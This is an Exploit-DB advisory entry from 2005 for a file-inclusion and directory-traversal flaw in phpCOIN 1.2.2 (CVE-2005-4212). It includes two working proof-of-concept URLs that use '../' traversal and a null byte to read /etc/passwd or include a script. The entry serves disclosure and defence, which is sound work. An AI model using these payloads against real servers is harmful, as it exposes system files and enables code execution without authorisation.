phpCOIN 1.2.2 - includes/db.php $_CCFG_PKG_PATH_DBSE Parameter Traversal Arbitrary File Access

2005-12-13T00:00:00
ID EDB-ID:26788
Type exploitdb
Reporter retrogod@aliceposta.it
Modified 2005-12-13T00:00:00

Description

phpCOIN 1.2.2 includes/db.php $_CCFG[_PKG_PATH_DBSE] Parameter Traversal Arbitrary File Access. CVE-2005-4212. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/15831/info
 
PhpCOIN is prone to a file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.
 
An attacker can exploit this issue to include arbitrary remote PHP code and execute it in the context of the Web server process. The attacker can also exploit this issue to include arbitrary local files through the use of directory traversal strings '../'.
 
Successful exploitation may lead to a compromise of the underlying system; other attacks are also possible. 

http://www.example.com/config.php?_CCFG[_PKG_PATH_DBSE]=../../../../../../../../etc/passwd%00
http://www.example.com/config.php?_CCFG[_PKG_PATH_DBSE]=../../../../../../../../script.php%00